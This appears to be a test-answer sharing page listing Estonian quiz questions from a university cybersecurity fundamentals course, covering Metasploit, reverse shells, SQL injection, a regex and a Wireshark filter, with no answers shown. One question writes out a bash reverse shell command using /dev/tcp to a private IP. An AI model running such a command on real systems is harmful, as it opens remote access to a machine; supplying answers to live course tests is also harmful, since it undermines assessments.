Looking for ITI0216 Küberturbe alused (2025 kevad) test answers and solutions? Browse our comprehensive collection of verified answers for ITI0216 Küberturbe alused (2025 kevad) at moodle.taltech.ee.
Get instant access to accurate answers and detailed explanations for your course questions. Our community-driven platform helps students succeed!
Milline süsteem aitab rakendada minimaalõiguste printsiipi (principle of least privilege) pilves?
Mida teeb Metasploit käsk "search FTP"?
Ründaja arvuti IP on 192.168.1.2 ja rünnatava (ohver) arvuti IP on 192.168.1.4
Ründaja käivitab edukalt enda arvutis (Kali) käsu "bash -i >& /dev/tcp/192.168.1.2/8000 0>&1" ja ohvri arvutis (Ubuntu) õnnestub edukalt käivitada käsk "nc -lnvp 8000".
Mida proovib ründaja saavutada ja kas see on tõenäoliselt edukas?
Mida aitab teha reverse shell (ehk vastukest)?
Mis liiki haavatavust/rünnet testitakse (kõige tõenäolisemalt) sellise koodi abil?
E-poe administraator avastas oma veebiserveri logidest päringud aadressile
Aadressi algus on E-poe ametlik kodulehe aadress, aga lõpp tundus veider.
Millest võiks selline päring olla tingitud?
^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$Millega on tegemist?
Mis tööriista kasutatakse tavaliselt Elastic süsteemis (Elastic Stack) andmete visualiseerimiseks?
Kas põhimõtteliselt on võimalik, et SQL süsti (SQL injection attack) abil on võimalik ära muuta mõne kasutaja parool?
Milline mõju on järgmisel Wireshark filtril?
not (ip.addr == 1.1.1.1 and udp.port == 53)